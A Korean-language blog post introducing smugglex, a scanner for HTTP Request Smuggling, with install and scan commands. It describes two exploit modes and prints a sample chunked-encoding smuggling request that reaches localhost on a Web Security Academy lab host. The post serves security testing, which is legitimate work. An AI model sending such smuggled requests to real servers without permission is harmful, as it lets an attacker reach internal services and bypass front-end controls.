Hello SmuggleX 👋🏼

안녕하세요! 최근 만들고 있던 새로운 도구 하나를 공개하고 𝕏를 통해 공유했습니다. HTTP Request Smuggling을 탐지하기 위한 도구인 smugglex입니다.

https://github.com/hahwul/smugglex

Installation

현재 Homebrew, Snapcraft, Nix, Cargo 등 다양한 패키지 매니저를 통한 설치를 지원하고 있습니다. Installation 문서 참고하셔서 원하는 도구로 설치하시면 됩니다.

# e.g.,
cargo install smugglex
brew install hahwul/smugglex/smugglex
nix profile install github:hahwul/smugglex

참고로 패키지 매니저들에 대한 지원은 제가 개발하는 도구들은 전체적으로 맞춰나갈 생각입니다. nix 등은 최근에 업데이트한 도구(noir, smugglex)에 지원하고 있고 dalfox(v3 코드 베이스에선 이미 적용), urx 등 다른 도구들도 비슷하게 설치 방식을 제공할 예정입니다.

Detect Smuggling

이 도구는 기본적으로 HTTP Request Smuggling을 탐지하는 것을 목표로 합니다. 아래와 같이 스캔을 진행할 수 있으며, 단일 타겟 또는 다수 타겟을 대상으로 스캔할 수 있습니다.

# Single target
smugglex https://target.com

# Multiple targets
cat urls.txt | smugglex

Smuggling이 확인되는 경우 아래와 같이 테스트할 수 있는 샘플 Request를 제공합니다.

Exploiting

smugglex는 현재 2가지의 Exploit 메소드를 제원합니다. 해당 기능을 사용하는 경우 Smuggling 탐지 시 추가적인 테스트를 진행합니다.

EXPLOIT:
  -e, --exploit <EXPLOIT>
          Exploit types to run after detection (comma-separated: localhost-access,path-fuzz)

localhost-access의 경우 smuggled된 요청을 통해 localhost의 여러 정보에 접근하는 기능을 수행합니다.

[*] Testing localhost access on port 80...
[*] Generated localhost payload for port 80

--- REQUEST ---
POST / HTTP/1.1
Host: 0a1100f0035b6b6380e0c60e005c00c4.web-security-academy.net
Connection: keep-alive
Content-Length: 6
Transfer-Encoding: chunked

1
X
0

GET / HTTP/1.1
Host: 127.0.0.1:80
Connection: close

path-fuzz는 사전 정의된 리스트 또는 사용자에게 입력받은 리스트(--exploit-wordlist)를 통해 smuggled된 요청으로 백엔드의 경로를 탐색합니다.

Next Plan

사실 공유한 이후로 많은 관심과 DM으로 피드백을 받았습니다. 기능도 기능이지만 우선 당분간은 Smuggling 탐지 성능(정탐은 늘리고, 오탐은 줄이는)을 목표로 하고 Exploit 부분을 계속 확대하며 나아가 단순 스캐너가 아닌 HTTP Request Smuggling을 테스트하는 전 과정에 개입되는 도구가 되길 희망합니다.

사용해보시고 개선됐으면 하는 부분들은 편히 이야기주시면 감사하겠습니다. 벌써 한 해가 끝나가네요! 모두 새해 복 많이 받으세요!